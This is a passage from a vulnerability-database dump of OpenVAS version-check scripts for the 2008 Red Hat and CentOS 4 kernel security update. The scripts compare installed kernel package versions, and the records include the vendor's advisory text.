script_id(870138);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0508-01\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"RedHat Update for kernel RHSA-2008:0508-01\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870138", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870138", "type": "openvas", "title": "RedHat Update for kernel RHSA-2008:0508-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2008:0508-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-June/msg00020.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870138\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0508-01\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"RedHat Update for kernel RHSA-2008:0508-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.20.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880015", "href": "http://plugins.openvas.org/nasl.php?oid=880015", "type": "openvas", "title": "CentOS Update for kernel CESA-2008:0508 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2008:0508 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015050.html\");\n script_id(880015);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0508\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"CentOS Update for kernel CESA-2008:0508 centos4 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880043", "href": "http://plugins.openvas.org/nasl.php?oid=880043", "type": "openvas", "title": "CentOS Update for kernel CESA-2008:0508 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2008:0508 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015051.html\");\n script_id(880043);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0508\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"CentOS Update for kernel CESA-2008:0508 centos4 x86_64\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880015", "type": "openvas", "title": "CentOS Update for kernel CESA-2008:0508 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2008:0508 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015050.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880015\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0508\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"CentOS Update for kernel CESA-2008:0508 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 